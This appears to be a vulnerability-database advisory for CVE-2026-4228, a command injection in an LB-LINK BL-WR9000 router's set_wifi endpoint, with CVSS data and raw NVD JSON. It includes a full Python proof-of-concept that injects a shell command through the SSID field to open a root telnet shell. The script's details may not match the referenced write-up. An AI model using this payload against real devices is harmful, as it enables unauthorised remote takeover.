CVE-2026-4228

Description

A vulnerability was detected in LB-LINK BL-WR9000 2.4.9. This affects the function sub_458754 of the file /goform/set_wifi. The manipulation results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:lb-link:bl-wr9000_firmware:2.4.9:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:lb-link:bl-wr9000:-:*:*:*:*:*:*:* - NOT VULNERABLE

LB-LINK BL-WR9000 固件版本 <= 2.4.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2026-4228 PoC - LB-LINK BL-WR9000 Command Injection
# Target: /goform/set_wifi endpoint

import requests
import sys

def exploit(target_ip, target_port=80):
    """Exploit command injection in LB-LINK BL-WR9000"""
    
    # Construct malicious payload - inject command via SSID parameter
    # Example: inject 'telnetd' to enable telnet service
    payload = "'; telnetd -p 23 -l /bin/sh; #"
    
    # Target endpoint
    url = f"http://{target_ip}:{target_port}/goform/set_wifi"
    
    # Malicious parameters
    data = {
        'ssid': payload,  # Command injection point
        ' encryption': 'psk2',
        'wpa_psk': 'password123'
    }
    
    try:
        print(f"[*] Sending exploit to {url}")
        print(f"[*] Payload: {payload}")
        
        response = requests.post(url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit sent successfully")
            print("[+] Telnet service should now be running on port 23")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4228
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4228
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4228/
[4] VulDB https://vuldb.com/cve/CVE-2026-4228
[5] https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_wlanpswencry%20command%20injection_EN.md
[6] https://vuldb.com/?ctiid.351151
[7] https://vuldb.com/?id.351151
[8] https://vuldb.com/?submit.771210

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4228", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:16.030", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in LB-LINK BL-WR9000 2.4.9. This affects the function sub_458754 of the file /goform/set_wifi. The manipulation results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en LB-LINK BL-WR9000 2.4.9. Esto afecta a la función sub_458754 del archivo /goform/set_wifi. La manipulación resulta en inyección de comandos. Es posible lanzar el ataque de forma remota. El exploit ahora es público y puede ser utilizado. El proveedor fue contactado con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lb-link:bl-wr9000_firmware:2.4.9:*:*:*:*:*:*:*", "matchCriteriaId": "0A23AFF5-C85A-4422-933E-02547D9E2859"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lb-link:bl-wr9000:-:*:*:*:*:*:*:*", "matchCriteriaId": "29EAB380-0F6C-4E9A-B7DA-5C36021E4175"}]}]}], "references": [{"url": "https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_wlanpswencry%20command%20injection_EN.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.351151", "source": ... (truncated)